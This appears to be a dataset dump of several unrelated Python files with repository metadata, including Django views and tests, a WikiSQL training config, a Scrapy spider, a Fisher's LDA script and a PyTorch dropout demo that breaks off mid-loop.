Mock-exams/02-Mock-exam/notes/notes/app/views.py
|
M0673N/Python-Web-Basics
|
cecc27f7a12f990756edcc8885290eb3b2e487b7
|
[
"MIT"
] | null | null | null |
Mock-exams/02-Mock-exam/notes/notes/app/views.py
|
M0673N/Python-Web-Basics
|
cecc27f7a12f990756edcc8885290eb3b2e487b7
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, redirect
from notes.app.forms import ProfileForm, NoteForm, NoteDeleteForm
from notes.app.models import Profile, Note
def home(request):
if request.method == 'GET':
profile = Profile.objects.first()
if not profile:
form = ProfileForm()
return render(request, 'home-no-profile.html', {'form': form})
else:
notes = Note.objects.all()
return render(request, 'home-with-profile.html', {'notes': notes})
else:
form = ProfileForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
return render(request, 'home-no-profile.html', {'form': form})
def add_note(request):
if request.method == 'GET':
form = NoteForm()
return render(request, 'note-create.html', {'form': form})
else:
form = NoteForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
return render(request, 'note-create.html', {'form': form})
def edit_note(request, pk):
note = Note.objects.get(pk=pk)
if request.method == 'GET':
form = NoteForm(instance=note)
return render(request, 'note-edit.html', {'form': form})
else:
form = NoteForm(request.POST, instance=note)
if form.is_valid():
form.save()
return redirect('home')
else:
return render(request, 'note-edit.html', {'form': form})
def delete_note(request, pk):
note = Note.objects.get(pk=pk)
if request.method == 'GET':
form = NoteDeleteForm(instance=note)
return render(request, 'note-delete.html', {'form': form})
else:
note.delete()
return redirect('home')
def note_details(request, pk):
note = Note.objects.get(pk=pk)
return render(request, 'note-details.html', {'note': note})
def profile_details(request):
profile = Profile.objects.first()
notes = Note.objects.all()
return render(request, 'profile.html', {'profile': profile, 'notes': notes.count()})
def delete_profile(request):
profile = Profile.objects.first()
notes = Note.objects.all()
profile.delete()
notes.delete()
return redirect('home')
| 29.291139
| 88
| 0.600259
| 270
| 2,314
| 5.111111
| 0.159259
| 0.086957
| 0.137681
| 0.1
| 0.626812
| 0.603623
| 0.542029
| 0.500725
| 0.364493
| 0.23913
| 0
| 0
| 0.256698
| 2,314
| 78
| 89
| 29.666667
| 0.802326
| 0
| 0
| 0.603175
| 0
| 0
| 0.107174
| 0.009507
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.047619
| 0
| 0.396825
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a09dff959ae1110da793fb71caa1d3736f73bf
| 3,066
|
py
|
Python
|
trainwiki.py
|
tomsonsgs/TRAN-MMA-master
|
91bf927c64a8d813ba60ae12e61e8f44830a82cc
|
[
"Apache-2.0"
] | null | null | null |
trainwiki.py
|
tomsonsgs/TRAN-MMA-master
|
91bf927c64a8d813ba60ae12e61e8f44830a82cc
|
[
"Apache-2.0"
] | null | null | null |
trainwiki.py
|
tomsonsgs/TRAN-MMA-master
|
91bf927c64a8d813ba60ae12e61e8f44830a82cc
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 2 00:56:18 2019
@author: tang
"""
seed=102
vocab="vocab.bin"
train_file="train.bin"
dropout=0.3
hidden_size=256
embed_size=100
action_embed_size=100
field_embed_size=32
type_embed_size=32
lr_decay=0.5
beam_size=5
patience=2
lstm='lstm'
col_att='affine'
model_name='wiki'
def updatetest(opt):
model_name1='wikitest.decode1'
#
opt.cuda =True
opt.mode ='test'
opt.load_model='saved_models/wikisql_bk/'+model_name+'.bin'
opt.beam_size=5
opt.parser='wikisql_parser'
opt.evaluator='wikisql_evaluator'
opt.sql_db_file='data/wikisql1/test.db'
opt.test_file='data/wikisql1/test.bin'
opt.save_decode_to='decodes/wikisql/'+model_name1
opt.decode_max_time_step=50
def update(opt):
opt.cuda=True
opt.seed=seed
opt.mode='train'
opt.batch_size=16
opt.parser='wikisql_parser'
opt.asdl_file='asdl/lang/sql/sql_asdl.txt'
opt.transition_system='sql'
opt.evaluator='wikisql_evaluator'
opt.train_file='data/wikisql1/'+train_file
opt.dev_file='data/wikisql1/test.bin'
opt.sql_db_file='data/wikisql1/test.db'
opt.vocab='data/wikisql1/'+vocab
opt.glove_embed_path='data/contrib/glove.6B.100d.txt'
opt.lstm =lstm
opt.column_att =col_att
opt.no_parent_state =True
opt.no_parent_field_embed =True
opt.no_parent_field_type_embed =True
opt.no_parent_production_embed =True
opt.hidden_size =hidden_size
opt.embed_size =embed_size
opt.action_embed_size =action_embed_size
opt.field_embed_size =field_embed_size
opt.type_embed_size =type_embed_size
opt.dropout =dropout
opt.patience =patience
opt.max_num_trial =5
opt.lr_decay =lr_decay
opt.glorot_init=True
opt.beam_size =beam_size
opt.eval_top_pred_only =True
opt.decode_max_time_step=50
opt.log_every=500
opt.save_to='saved_models/wikisql_bk/'+model_name
#python -u exp.py \
# --cuda \
# --seed ${seed} \
# --mode train \
# --batch_size 64 \
# --parser wikisql_parser \
# --asdl_file asdl/lang/sql/sql_asdl.txt \
# --transition_system sql \
# --evaluator wikisql_evaluator \
# --train_file data/wikisql/${train_file} \
# --dev_file data/wikisql/dev.bin \
# --sql_db_file data/wikisql/dev.db \
# --vocab data/wikisql/${vocab} \
# --glove_embed_path data/contrib/glove.6B.100d.txt \
# --lstm ${lstm} \
# --column_att ${col_att} \
# --no_parent_state \
# --no_parent_field_embed \
# --no_parent_field_type_embed \
# --no_parent_production_embed \
# --hidden_size ${hidden_size} \
# --embed_size ${embed_size} \
# --action_embed_size ${action_embed_size} \
# --field_embed_size ${field_embed_size} \
# --type_embed_size ${type_embed_size} \
# --dropout ${dropout} \
# --patience ${patience} \
# --max_num_trial 5 \
# --lr_decay ${lr_decay} \
# --glorot_init \
# --beam_size ${beam_size} \
# --eval_top_pred_only \
# --decode_max_time_step 50 \
# --log_every 10 \
# --save_to saved_models/wikisql/${model_name}
| 28.924528
| 63
| 0.689498
| 458
| 3,066
| 4.286026
| 0.237991
| 0.091696
| 0.038207
| 0.040754
| 0.395313
| 0.26541
| 0.102904
| 0.102904
| 0.073357
| 0
| 0
| 0.027144
| 0.170907
| 3,066
| 105
| 64
| 29.2
| 0.745083
| 0.377038
| 0
| 0.16129
| 0
| 0
| 0.192926
| 0.101822
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0
| 0
| 0.032258
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a18b845016664a0d3350f6afe5c55f943340ff
| 3,476
|
py
|
Python
|
heritago/heritages/tests/tests_annotationdatamodel.py
|
SWE574-Groupago/heritago
|
ec7d279df667a4f2c3560dfac4b5b17046163a95
|
[
"MIT"
] | 6
|
2017-02-13T10:22:18.000Z
|
2017-03-11T20:38:30.000Z
|
heritago/heritages/tests/tests_annotationdatamodel.py
|
SWE574-Groupago/heritago
|
ec7d279df667a4f2c3560dfac4b5b17046163a95
|
[
"MIT"
] | 172
|
2017-02-12T21:07:27.000Z
|
2017-06-08T10:46:58.000Z
|
heritago/heritages/tests/tests_annotationdatamodel.py
|
SWE574-RenameMe/heritago
|
ec7d279df667a4f2c3560dfac4b5b17046163a95
|
[
"MIT"
] | 17
|
2017-02-13T08:29:37.000Z
|
2017-06-29T14:43:53.000Z
|
import unittest
from django.test import Client
class AnnotationDataModelTests(unittest.TestCase):
api_url_template = "/api/v1/heritages/#/annotations"
xpath_annotation_response = ""
heritage_path = ""
api_url_set = ""
@classmethod
def setUpClass(cls):
cls.heritage_path = "/api/v1/heritages/"
h_id = cls.create_heritage_item()
cls.api_url_set = cls.api_url_template.replace("#", str(h_id))
cls.ann_response = cls.create_XPATH_annotation()
cls.ann_id = cls.ann_response["id"].rsplit("/", 2)[-2]
cls.ann_get_response = Client().get(cls.api_url_set + "/" + str(cls.ann_id)).json()
@classmethod
def create_heritage_item(cls):
client = Client()
r = client.post(cls.heritage_path, {
"title": "Santa Clause",
"description": "Santa Claus, also known as Saint Nicholas, Saint Nick, Kris Kringle, Father Christmas, "
"or simply Santa (Santy in Hiberno-English), is a legendary figure of Western Christian "
"culture who is said to bring gifts to the homes of well-behaved (\"good\" or \"nice\") "
"children on Christmas Eve (24 December) and the early morning hours of Christmas Day "
"(25 December).",
"startDate": "1087",
"endDate": "continuing",
"exactDate": "1700",
"origin": [{"name": "Dutch"}, {"name": "British"}],
"basicInformation": [{"name": "AKA", "value": "Sinterklaas"}],
"tags": [{"name": "religion"}, {"name": "christmas"}, {"name": "figure"}]
})
return r.json()['id']
@classmethod
def create_XPATH_annotation(cls):
return Client().post(cls.api_url_set, {
"@context": "http://www.w3.org/ns/anno.jsonld",
"type": "Annotation",
"creator": "me",
"body": [
{
"type": "video",
"format": "text/plain",
"value": "loved it"
}
],
"target": [
{
"type": "text",
"format": "text/plain",
"selector": [
{
"type": "FragmentSelector",
"conformsTo": "http://tools.ietf.org/rfc/rfc5147",
"value": "char=2,4"
}
]
}
]
}).json()
def test_create_XPATH_annotation(self):
ann_id = self.create_XPATH_annotation()
self.assertTrue(len(ann_id) > 0)
def test_annotation_must_have_1_or_more_context_property(self):
self.assertTrue("@context" in self.ann_get_response.keys())
def test_an_annotation_must_have_exactly_1_IRI_that_defines_it(self):
self.assertTrue("id" in self.ann_get_response.keys())
def test_an_annotation_must_have_1_or_more_types_and_the_annotation_class_must_be_one_of_them(self):
self.assertTrue(self.ann_get_response["type"], "Annotation")
def test_an_annotation_must_have_body_relationships_associated_with_it(self):
self.assertTrue("body" in self.ann_get_response.keys())
def test_there_must_be_1_or_more_target_relationships_associated_with_an_annotation(self):
self.assertTrue("target" in self.ann_get_response.keys())
| 39.954023
| 116
| 0.561277
| 378
| 3,476
| 4.880952
| 0.415344
| 0.019512
| 0.045528
| 0.04878
| 0.117073
| 0.117073
| 0.072087
| 0.072087
| 0.055285
| 0.055285
| 0
| 0.011696
| 0.311277
| 3,476
| 86
| 117
| 40.418605
| 0.758981
| 0
| 0
| 0.068493
| 0
| 0
| 0.238918
| 0.008923
| 0
| 0
| 0
| 0
| 0.082192
| 1
| 0.123288
| false
| 0
| 0.027397
| 0.013699
| 0.246575
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a26fd47a49716298a92bfa1c231de0e135e9dd
| 824
|
py
|
Python
|
tests/test_main.py
|
cesarbruschetta/julio-cesar-decrypter
|
1f8b94b6370fb0a8bbfc1fa6b44adc9d69bf088c
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_main.py
|
cesarbruschetta/julio-cesar-decrypter
|
1f8b94b6370fb0a8bbfc1fa6b44adc9d69bf088c
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_main.py
|
cesarbruschetta/julio-cesar-decrypter
|
1f8b94b6370fb0a8bbfc1fa6b44adc9d69bf088c
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
from unittest.mock import patch
from jc_decrypter.main import process, main
class TestMainProcess(unittest.TestCase):
@patch("jc_decrypter.main.decrypter")
def test_arg_decrypter(self, mk_decrypter):
process(["--token", "1234567890"])
mk_decrypter.assert_called_once_with("1234567890")
def test_not_arg(self):
with self.assertRaises(SystemExit) as cm:
process([])
self.assertEqual(
"the following arguments are required: --token/-t", str(cm.exception)
)
class TestMainMain(unittest.TestCase):
@patch("jc_decrypter.main.process")
def test_main_process(self, mk_process):
mk_process.return_value = 0
self.assertRaises(SystemExit, main)
mk_process.assert_called_once_with(["test"])
| 27.466667
| 85
| 0.679612
| 96
| 824
| 5.614583
| 0.427083
| 0.061224
| 0.083488
| 0.085343
| 0.133581
| 0.133581
| 0
| 0
| 0
| 0
| 0
| 0.032458
| 0.214806
| 824
| 29
| 86
| 28.413793
| 0.800618
| 0
| 0
| 0
| 0
| 0
| 0.158981
| 0.063107
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.15
| false
| 0
| 0.15
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a3a2aba365270bf90b9a6d7673d3d58bca51fe
| 3,290
|
py
|
Python
|
template_maker/data/documents.py
|
codeforamerica/template-maker
|
66d4744c123d5b868cf259e947dc924bb5a25c9a
|
[
"BSD-3-Clause"
] | 9
|
2015-02-23T22:03:30.000Z
|
2020-01-31T19:06:50.000Z
|
template_maker/data/documents.py
|
codeforamerica/template-maker
|
66d4744c123d5b868cf259e947dc924bb5a25c9a
|
[
"BSD-3-Clause"
] | 37
|
2015-03-01T01:10:22.000Z
|
2015-12-31T17:24:42.000Z
|
template_maker/data/documents.py
|
codeforamerica/template-maker
|
66d4744c123d5b868cf259e947dc924bb5a25c9a
|
[
"BSD-3-Clause"
] | 2
|
2016-01-21T09:59:17.000Z
|
2021-04-16T10:51:04.000Z
|
import datetime
from template_maker.database import db
from template_maker.generator.models import DocumentBase, DocumentPlaceholder
from template_maker.builder.models import TemplateBase, TemplatePlaceholders
from template_maker.data.placeholders import get_template_placeholders
def get_all_documents():
'''
Returns all documents currently being edited
'''
return DocumentBase.query.all()
def get_documents_and_parent_templates():
return db.session.query(
DocumentBase.id, DocumentBase.name, TemplateBase.title
).filter(DocumentBase.template_id==TemplateBase.id).all()
def get_document_placeholders(document_id):
'''
Gets all the placeholders associated with a document
'''
return db.session.query(
DocumentPlaceholder.id, TemplatePlaceholders.full_name, TemplatePlaceholders.type,
TemplatePlaceholders.display_name, DocumentPlaceholder.value
).filter(DocumentPlaceholder.document_id==document_id).filter(
DocumentPlaceholder.placeholder_id==TemplatePlaceholders.id
).all()
def get_single_document(document_id):
'''
Returns a single document from a template_id
'''
return DocumentBase.query.get(document_id)
def get_single_document_and_parent_template(document_id):
return db.session.query(
DocumentBase.id, DocumentBase.name, TemplateBase.title
).filter(DocumentBase.template_id==TemplateBase.id).filter(
DocumentBase.id==document_id
).first()
def set_document_placeholders(template_id, document_base):
# create the placeholders for the document
placeholders = get_template_placeholders(template_id)
for placeholder in placeholders:
_placeholder = DocumentPlaceholder.query.filter(
DocumentPlaceholder.placeholder_id==placeholder.id
).filter(
DocumentPlaceholder.document_id==document_base.id
).first()
# if we already have this placeholder, pass
if _placeholder:
continue
new_placeholder = DocumentPlaceholder(
document_id=document_base.id,
placeholder_id=placeholder.id,
)
db.session.add(new_placeholder)
db.session.commit()
def update_documents(template_id):
# get all non-published documents based on the template
documents = DocumentBase.query.filter(
DocumentBase.template_id==template_id
).all()
for document in documents:
set_document_placeholders(template_id, document)
return len(documents)
def create_new_document(template_id, data):
now = datetime.datetime.utcnow()
# create the document
document_base = DocumentBase(
created_at=now,
updated_at=now,
name=data.get('name'),
template_id=template_id
)
db.session.add(document_base)
db.session.commit()
set_document_placeholders(template_id, document_base)
return document_base.id
def save_document_section(placeholders, data):
for placeholder in placeholders:
_placeholder = DocumentPlaceholder.query.get(placeholder.id)
_placeholder.value = data.get(placeholder.display_name, '')
db.session.commit()
return True
def delete_document(document):
db.session.delete(document)
db.session.commit()
return True
| 31.333333
| 90
| 0.730091
| 363
| 3,290
| 6.402204
| 0.212121
| 0.055938
| 0.02926
| 0.025818
| 0.283993
| 0.241394
| 0.186747
| 0.093804
| 0.093804
| 0.093804
| 0
| 0
| 0.189362
| 3,290
| 104
| 91
| 31.634615
| 0.871391
| 0.091185
| 0
| 0.239437
| 0
| 0
| 0.00136
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.140845
| false
| 0
| 0.070423
| 0.028169
| 0.338028
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a3b150e872655275d100c3ba1868368c2d52e0
| 716
|
py
|
Python
|
katph/spiders/stackoverflow_spider.py
|
trujunzhang/katph
|
b71b5a7171b133fcf087f77cd612c13a966ecd61
|
[
"MIT"
] | null | null | null |
katph/spiders/stackoverflow_spider.py
|
trujunzhang/katph
|
b71b5a7171b133fcf087f77cd612c13a966ecd61
|
[
"MIT"
] | null | null | null |
katph/spiders/stackoverflow_spider.py
|
trujunzhang/katph
|
b71b5a7171b133fcf087f77cd612c13a966ecd61
|
[
"MIT"
] | null | null | null |
import scrapy
from scrapy.selector import Selector
from katph.items import StackItem
class katphSpider(scrapy.Spider):
name = "stackoverflow"
allowed_domains = ["stackoverflow.com"]
start_urls = [
"%s/questions?pagesize=50&sort=newest" % "http://stackoverflow.com",
]
def parse(self, response):
questions = Selector(response).xpath('//div[@class="summary"]/h3')
for question in questions:
item = StackItem()
item['title'] = question.xpath(
'a[@class="question-hyperlink"]/text()').extract()[0]
item['url'] = question.xpath(
'a[@class="question-hyperlink"]/@href').extract()[0]
yield item
| 31.130435
| 76
| 0.603352
| 75
| 716
| 5.733333
| 0.6
| 0.074419
| 0.065116
| 0.088372
| 0.167442
| 0.167442
| 0
| 0
| 0
| 0
| 0
| 0.009259
| 0.24581
| 716
| 22
| 77
| 32.545455
| 0.787037
| 0
| 0
| 0
| 0
| 0
| 0.27514
| 0.188547
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.166667
| 0
| 0.444444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a6214120a911400cce37d1a1a474426ab60fe5
| 1,284
|
py
|
Python
|
hardware/joystick.py
|
davidji/roundbot
|
2ca34a83c9feb3331f1b818106f06b3182c4970e
|
[
"Apache-2.0"
] | null | null | null |
hardware/joystick.py
|
davidji/roundbot
|
2ca34a83c9feb3331f1b818106f06b3182c4970e
|
[
"Apache-2.0"
] | null | null | null |
hardware/joystick.py
|
davidji/roundbot
|
2ca34a83c9feb3331f1b818106f06b3182c4970e
|
[
"Apache-2.0"
] | null | null | null |
from solid import *
from solid.utils import *
import util
from util import inch_to_mm, tube, ABIT, corners, pipe
from fixings import M3
from math import tan, radians
"""
Sub-miniature analog joy-sticks.
There's not much useful in documentation of their measurements.
I'm going to treat it like a sphere with a 14mm radius, with a
12mm diameter cylinder sticking out the top.
40 degrees in any direction. The knob on the top is 20mm wide
so the hole in the panel must be at least that wide.
"""
fixing = M3
width=35.0
depth=35.0
pivot_height=9.6
panel_height=11.0
height=pivot_height+panel_height
def block():
return down(pivot_height+panel_height)(forward(1.8)(linear_extrude(height)(square([35,35], center=True))) -
up(pivot_height)(sphere(r=14.0)) -
down(ABIT)(cylinder(h=pivot_height+ABIT, r=14.0)) +
up(pivot_height)(hole()(cylinder(r1=6.0, r2=6.0 + tan(radians(30.0))*panel_height, h=panel_height))) -
forward(1.8)(linear_extrude(pivot_height)(square([14.0, depth], center=True))) -
forward(1.8)(linear_extrude(1.6)(square([25.5, 32.0], center=True))))
def fixings():
return corners(20.4, 26.6)
def export_scad():
util.save('joystick-block', block())
if __name__ == '__main__':
export_scad()
| 28.533333
| 114
| 0.696262
| 215
| 1,284
| 4.032558
| 0.506977
| 0.088812
| 0.031142
| 0.051903
| 0.101499
| 0.076125
| 0.076125
| 0
| 0
| 0
| 0
| 0.059211
| 0.17134
| 1,284
| 44
| 115
| 29.181818
| 0.755639
| 0
| 0
| 0
| 0
| 0
| 0.023037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0
| 0.24
| 0.08
| 0.44
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9ab3dbd3f61574c06a9441f006ee914a6d3064c
| 4,458
|
py
|
Python
|
Fishers LDA/fishersLDA.py
|
Exorust/Machine-Learning-Algorithms
|
c634fd0a1a49ea2574f0867b591ee8a2cd401fd2
|
[
"MIT"
] | null | null | null |
Fishers LDA/fishersLDA.py
|
Exorust/Machine-Learning-Algorithms
|
c634fd0a1a49ea2574f0867b591ee8a2cd401fd2
|
[
"MIT"
] | null | null | null |
Fishers LDA/fishersLDA.py
|
Exorust/Machine-Learning-Algorithms
|
c634fd0a1a49ea2574f0867b591ee8a2cd401fd2
|
[
"MIT"
] | null | null | null |
'''**********************************************
CODE TO IMPLEMENT FISHER'S LDA -
Given two dimensional dataset with two classes 0 and 1,
Perform Fisher's LDA on the dataset,
Perform dimensionality reduction and find the suitable vector to project it onto,
Find the threshold value for separation of the two classes
***********************************************'''
import numpy as np
import matplotlib.pyplot as plt
import time
# to calculate the execution time of th clustering
start_time = time.time()
# reading data csv file
my_data = np.genfromtxt('datasets/dataset_3.csv', delimiter=',')
# deleting the serial number column
data=np.delete(my_data,0,1)
# separating the two classes and deleting the target variable column
class0 = data[np.nonzero(data[:,2] == 0)]
class1=data[np.nonzero(data[:,2]==1)]
class0=np.delete(class0,2,1)
class1=np.delete(class1,2,1)
# finding the mean of the the two classes
mean0=np.mean(class0,0)
mean1=np.mean(class1,0)
''' calculating the variability of the two classes using the formula :
variability=summation over points belonging to class 1((xi-mean)(xi-mean)tanspose)
'''
var0=np.zeros(1)
temp=np.array(mean0)
for i in range (class0.shape[0]) :
temp=(class0[i,:]-mean0)
var0+=np.dot(temp, temp.T)
var1=np.zeros(1)
temp=np.array(mean1)
for i in range (class1.shape[0]) :
temp=(class1[i,:]-mean1)
var1+=np.dot(temp, temp.T)
sw=var1+var0
# calculating the inverse of Sw matrix
invsw=np.array([(1/sw[0])])
# calculating the w vector using below formula
w=invsw*(mean1-mean0)
# declaring arrays for storing points' distance from the vector
dist0=np.zeros((class0.shape[0],1))
dist1=np.zeros((class1.shape[0],1))
# finding the the vector to project the points on;
# such that the means are farthest from each other
wperp=np.array([-w[1],w[0]])
# finding the norm of the w vector
norm_w=np.linalg.norm(wperp)
''' calculating the distance of original data points from the vector using the formula:
r=w.T/norm(w)
'''
for i in range(dist0.shape[0]):
dist0[i]=np.dot(wperp.T,class0[i,:])/norm_w
for i in range(dist1.shape[0]):
dist1[i]=np.dot(wperp.T,class1[i,:])/norm_w
''' declaring the arrays to store the projected points data using formula:
x_projected = x_actual-r*w/norm(w)
'''
class0proj=np.zeros((class0.shape[0],2))
class1proj=np.zeros((class1.shape[0],2))
for i in range(class0.shape[0]):
class0proj[i,:]=np.subtract((class0[i,:]),(dist0[i]*wperp.T/norm_w))
for i in range(class1.shape[0]):
class1proj[i,:]=np.subtract((class1[i,:]),(dist1[i]*wperp.T/norm_w))
# displaying the plot with the original data , projected points and line
plt.scatter(class0[:,0],class0[:,1])
plt.scatter(class1[:,0],class1[:,1])
plt.scatter(class0proj[:,0],class0proj[:,1],color='blue')
plt.scatter(class1proj[:,0],class1proj[:,1],color='red')
#concatenating the two classes into a single array
pointsproj=np.concatenate((class0proj,class1proj),axis=0)
plt.plot(pointsproj[:,0],pointsproj[:,1],'m')
# storing dimensionally reduced projected points in array using formula:
# y(x) = w.T*x
newproj0=np.zeros((class0.shape[0],1))
newproj1=np.zeros((class1.shape[0],1))
for i in range(class0.shape[0]):
newproj0[i,:]=np.dot(wperp.T,class0[i,:])
for i in range(class1.shape[0]):
newproj1[i,:]=np.dot(wperp.T,class1[i,:])
# storing the means and standard deviations of the projected points
proj0mean=np.mean(newproj0)
proj1mean=np.mean(newproj1)
proj0std=np.std(newproj0)
proj1std=np.std(newproj1)
'''
Below function "solve" to finds the threshold value separating the two
classes when dimensionally reduced -
input : m1, m2 - means of the two classes whose point of intersection needs to be found
std1, std2 - the standard deviations of the two classes
'''
def solve(m1,m2,std1,std2):
a = 1/(2*std1**2) - 1/(2*std2**2)
b = m2/(std2**2) - m1/(std1**2)
c = m1**2 /(2*std1**2) - m2**2 / (2*std2**2) - np.log(std2/std1)
roots= np.roots([a,b,c])
# since two possible points of intersection , we select the one which lies in between the two means
if roots.shape[0]>1:
for i in range(2):
if roots[i] !=max(m1,m2,roots[i]) or roots[i]!=min(m1,m2,roots[i]):
return roots[i]
else:
return roots
threshold=solve(proj0mean,proj1mean,proj0std,proj1std)
print("Threshold value =", threshold)
print("Time taken = ",(time.time()-start_time))
plt.savefig('Results/Result3.png')
| 32.540146
| 104
| 0.685509
| 729
| 4,458
| 4.175583
| 0.260631
| 0.029566
| 0.01774
| 0.032523
| 0.167214
| 0.127792
| 0.086071
| 0
| 0
| 0
| 0
| 0.045764
| 0.142216
| 4,458
| 136
| 105
| 32.779412
| 0.750262
| 0.274563
| 0
| 0.085714
| 0
| 0
| 0.031373
| 0.008627
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014286
| false
| 0
| 0.042857
| 0
| 0.085714
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9ad668ebc54401a790054fd2f8bfe6c1d6a7c9b
| 3,071
|
py
|
Python
|
study/pytorch_study/14_dropout.py
|
strawsyz/straw
|
db313c78c2e3c0355cd10c70ac25a15bb5632d41
|
[
"MIT"
] | 2
|
2020-04-06T09:09:19.000Z
|
2020-07-24T03:59:55.000Z
|
study/pytorch_study/14_dropout.py
|
strawsyz/straw
|
db313c78c2e3c0355cd10c70ac25a15bb5632d41
|
[
"MIT"
] | null | null | null |
study/pytorch_study/14_dropout.py
|
strawsyz/straw
|
db313c78c2e3c0355cd10c70ac25a15bb5632d41
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import torch
n_input = 1
# n_hidden should be very big to make dropout's effect more clear
n_hidden = 100
n_output = 1
EPOCH = 1000
LR = 0.01
torch.manual_seed(1) # reproducible
N_SAMPLES = 20
# training data
x = torch.unsqueeze(torch.linspace(-1, 1, N_SAMPLES), 1)
y = x + 0.3 * torch.normal(torch.zeros(N_SAMPLES, 1), torch.ones(N_SAMPLES, 1))
# test data
test_x = torch.unsqueeze(torch.linspace(-1, 1, N_SAMPLES), 1)
test_y = test_x + 0.3 * torch.normal(torch.zeros(N_SAMPLES, 1), torch.ones(N_SAMPLES, 1))
# show data
plt.scatter(x.data.numpy(), y.data.numpy(), c='magenta', s=50, alpha=0.5, label='train')
plt.scatter(test_x.data.numpy(), test_y.data.numpy(), c='cyan', s=50, alpha=0.5, label='test')
plt.legend(loc='upper left')
plt.ylim((-2.5, 2.5))
plt.show()
net_overfitting = torch.nn.Sequential(
torch.nn.Linear(n_input, n_hidden),
torch.nn.ReLU(),
torch.nn.Linear(n_hidden, n_hidden),
torch.nn.ReLU(),
torch.nn.Linear(n_hidden, n_output)
)
net_dropout = torch.nn.Sequential(
torch.nn.Linear(n_input, n_hidden),
torch.nn.Dropout(0.5),
torch.nn.ReLU(),
torch.nn.Linear(n_hidden, n_hidden),
torch.nn.Dropout(0.5),
torch.nn.ReLU(),
torch.nn.Linear(n_hidden, n_output)
)
optimizer_overfit = torch.optim.Adam(net_overfitting.parameters(), lr=LR)
optimizer_drop = torch.optim.Adam(net_dropout.parameters(), lr=LR)
loss_func = torch.nn.MSELoss()
plt.ion()
for i in range(EPOCH):
pred_overfit = net_overfitting(x)
pred_drop = net_dropout(x)
loss_overfit = loss_func(pred_overfit, y)
loss_drop = loss_func(pred_drop, y)
optimizer_overfit.zero_grad()
optimizer_drop.zero_grad()
loss_overfit.backward()
loss_drop.backward()
optimizer_overfit.step()
optimizer_drop.step()
# 接着上面来
if i % 10 == 0: # 每 10 步画一次图
# change to eval mode in order to fix drop out effect
net_overfitting.eval()
# parameters for dropout differ from train mode
net_dropout.eval()
# plotting
plt.cla()
test_pred_ofit = net_overfitting(test_x)
test_pred_drop = net_dropout(test_x)
plt.scatter(x.data.numpy(), y.data.numpy(), c='magenta', s=5, alpha=0.3, label='train')
plt.scatter(test_x.data.numpy(), test_y.data.numpy(), c='cyan', s=5, alpha=0.3, label='test')
plt.plot(test_x.data.numpy(), test_pred_ofit.data.numpy(), 'r-', lw=3, label='overfitting')
plt.plot(test_x.data.numpy(), test_pred_drop.data.numpy(), 'b--', lw=3, label='dropout(50%)')
plt.text(0, -1.2, 'overfitting loss=%.4f' % loss_func(test_pred_ofit, test_y).data.numpy(),
fontdict={'size': 12, 'color': 'red'})
